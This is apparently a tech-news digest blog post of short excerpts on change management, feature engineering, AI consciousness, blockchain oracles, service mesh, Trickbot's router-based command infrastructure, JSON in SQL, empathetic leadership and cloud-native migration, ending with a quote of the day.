10 hard truths of change management
“We do a terrible job of understanding and navigating the emotional journey of
change,” says Wanda Wallace, leadership coach and managing partner of Leadership
Forum. “This is where leaders need to get smart.” While some people may welcome
it, “change is also about loss — loss of my current capability while I learn new
ones, loss of who I go to to solve a problem, loss of established ways of doing
things,” says Wallace. “Even if someone loves the rationale for the change, they
still have to grieve the loss of what was and the loss of the ease of knowing
what to do even if it wasn’t efficient.” It also involves fear. “This is usually
labelled as ‘resistance,’ but I find many times it is fear of not being able to
learn the new skills, not being as valued after the change, not feeling
competent, not being at the center of activity the way they were before the
change,” says Wallace. She advises IT leaders to name those fears, acknowledge
them, and talk about the journey of learning — not just from the C-suite, but at
the manager level.
Feature Engineering for Machine Learning (1/3)
During EDA, one of the first steps to undertake should be to check for and
remove constant features. But surely the model can discover that on its own?
Yes, and no. Consider a Linear Regression model where a non-zero weight has been
initialized to a constant feature. This term then serves as a secondary ‘bias’
term and seems harmless enough … but not if that ‘constant’ term was constant
only in our training data, and (unbeknownst to us) later takes on a different
value in our production/test data. Another thing to be on the lookout for is
duplicated features. This may not be blatantly obvious when it comes to
categorical data, as it might manifest as different labels names being assigned
to the same attribute across different columns, e.g. One feature uses ‘XYZ’ to
denote a categorical class that another feature denotes as ‘ABC’, perhaps due to
the columns being culled from different databases or departments. pd.factorize()
can help identify if two features are synonymous.
OpenAI’s Chief Scientist Claimed AI May Be Conscious — and Kicked Off a Furious Debate
Consciousness is at times mentioned in conversations about AI. Although
inseparable from intelligence in the case of humans, it isn’t clear whether
that’d be the case for machines. Those who dislike AI anthropomorphization often
attack the notion of “machine intelligence.” Consciousness, being even more
abstract, usually comes off worse. And rightly so, as consciousness — not unlike
intelligence — is a fuzzy concept that lives in the blurred intersection of
philosophy and the cognitive sciences. The origins of the modern concept can be
traced back to John Locke’s work. He described it as “the perception of what
passes in a man’s own mind.” However, it has proved to be an elusive concept.
There are multiple models and hypotheses on consciousness that have gotten more
or less interest throughout the years but the scientific community hasn’t yet
arrived at a consensual definition. For instance, panpsychism — which comes to
mind reading Sutskever’s thoughts — is a singular idea that got some traction
recently.
Cryptographic Truth: The Future of Trust-Minimized Computing and Record-Keeping
The focus of this article so far has been on how blockchains combine
cryptography and game theory to consistently form honest consensus—the
truth—regarding the validity of internal transactions. However, how can events
happening outside a blockchain be reliably verified? Enter Chainlink. Chainlink
is a decentralized oracle network designed to generate truth about external data
and off-chain computation. In this sense, Chainlink generates truth from largely
non-deterministic environments. Determinism is a feature of computation where a
specific input will always lead to a specific output, i.e., code will execute
exactly as written. Decentralized blockchains are said to be deterministic
because they employ trust-minimization techniques that remove or lower to a near
statistical impossibility any variables that could inhibit internal transaction
submission, execution, and verification. The challenge with non-deterministic
environments is that the truth can be subjective, difficult to obtain, or
expensive to verify.
Red Hat cloud leader defects to service mesh upstart
When service mesh first came out, Kubernetes was in such a fervor -- it had been
three or four years, so people had gone through the high of it, and saw the
potential, and then there was a little bit of a lull in the hype when it hadn't
really exploded in terms of usage. So when service mesh came out, for certain
people, it was just like, 'Oh, cool, here's the new thing.' And it was new, 1.0
sort of stuff. If you fast forward, now, four years from that, Kubernetes is now
at the point where it's super stable, it's being released less often. You have a
lot more companies who are deploying Kubernetes [that are] starting to build new
applications. We saw a lot of companies [during] the pandemic build new
applications at a faster rate than they did before. [Solo.io customer]
Chick-fil-A is an example -- at their thousands of stores as a franchise,
before, most people parked their car, went in the store, then came out.
Nowadays, the first interaction everybody has with the store is, 'I go on the
app, I place my order, I get my loyalty points.'
Ceramic’s Web3 Composability Resurrects Web 2.0 Mashups
One of the more interesting composability projects to emerge in Web3 is Ceramic,
which calls itself “a decentralized data network that brings unlimited data
composability to Web3 applications.” It’s basically a data conduit between dApps
(decentralized applications), blockchains, and the various flavors of
decentralized storage. The idea is that a dApp developer can use Ceramic to
manage “streams” of data, which can then be re-used or re-purposed by other
dApps via an open API. Unlike most blockchains, Ceramic is also able to easily
scale. A blog post on the Ceramic website explains that “each Ceramic node acts
as an individual execution environment for performing computations and
validating transactions on streams – there is no global ledger.” Also noteworthy
about Ceramic is its use of DIDs (Decentralized Identifiers), a W3C web standard
for authentication that I wrote about last year. The DID standard allows Ceramic
users to transact with streams using decentralized identities.
Uncovering Trickbot’s use of IoT devices in command-and-control infrastructure
A significant part of its evolution also includes making its attacks and
infrastructure more durable against detection, including continuously improving
its persistence capabilities, evading researchers and reverse engineering, and
finding new ways to maintain the stability of its command-and-control (C2)
framework. This continuous evolution has seen Trickbot expand its reach from
computers to Internet of Things (IoT) devices such as routers, with the malware
updating its C2 infrastructure to utilize MikroTik devices and modules. MikroTik
routers are widely used around the world across different industries. By using
MikroTik routers as proxy servers for its C2 servers and redirecting the traffic
through non-standard ports, Trickbot adds another persistence layer that helps
malicious IPs evade detection by standard security systems. The Microsoft
Defender for IoT research team has recently discovered the exact method through
which MikroTik devices are used in Trickbot’s C2 infrastructure.
Why (and How) You Should Manage JSON with SQL
JSON documents can be large and contain values spread across tables in your
relational database. This can make creating and consuming these APIs challenging
because you may need to combine data from several tables to form a response.
However, when consuming a service API, you have the opposite problem, that is,
splitting a large (aka massive) JSON document into appropriate tables. Using
custom-written code to map these elements in the application tier is tedious.
Such custom code, unless super-carefully constructed by someone who knows how
databases work, can also lead to many roundtrips to the database service,
slowing the application to a crawl and potentially consuming excess bandwidth.
... The free-form nature of JSON is both its biggest strength and its biggest
weakness. Once you start storing JSON documents in your database, it’s easy to
lose track of what their structure is. The only way to know the structure of a
document is to query its attributes. The JSON Data Guide is a function that
solves this problem for you.
The new CEO: Chief Empathy Officer
Top leadership has historically been responsible only for numbers and the bottom
line. Profitability and utilization numbers are still important, but they
generally do not motivate employees outside of the leadership, shareholders, and
the board. Similarly, the feelings and well-being of the staff have long been
the primary responsibility of the HR team. This no longer works in a company
that is growing sustainably. The “Great Resignation” indicates that well-being
has taken on a new level of critical importance. Arguably, a key contributor to
this phenomenon has been employees’ lack of emotional connection to their
employers. How can leaders help people feel their connection to the organization
when they are physically separated? Empathy is the answer. The understanding of
the empathetic leader bridges gaps and is a key component in communicating the
personal role people have in the strategy of the company. In short, empathy is
not just a tactic. Genuine concern for people is the ultimate business strategy
for growth.
Four key considerations when moving from legacy to cloud-native
The Cloud Native Computing Foundation (CNCF) defines it as “scalable
applications in modern, dynamic environments such as public, private, and hybrid
clouds” – characterised by “containers, service meshes, microservices, immutable
infrastructure, and declarative APIs.” However, cloud-native computing is more
than just running software or infrastructure on the cloud, as cloud-only
services still requires constant tweaking whenever you deploy applications. With
cloud-native technology however, your applications run on stateless servers and
immutable infrastructure that doesn’t require constant modification. According
to a 2020 Cloud Native Foundation Survey, 51% of respondents stated improved
scalability, shorter deployment time, and consistent availability as the top
benefits for using cloud-native technology in their projects. Furthermore,
Gartner claims more than 45% of IT spending will be reallocated from legacy
systems to cloud solutions by 2024.
Quote for the day:
"Leaders are people who believe so
passionately that they can seduce other people into sharing their dream." --
Warren G. Bennis,
No comments:
Post a Comment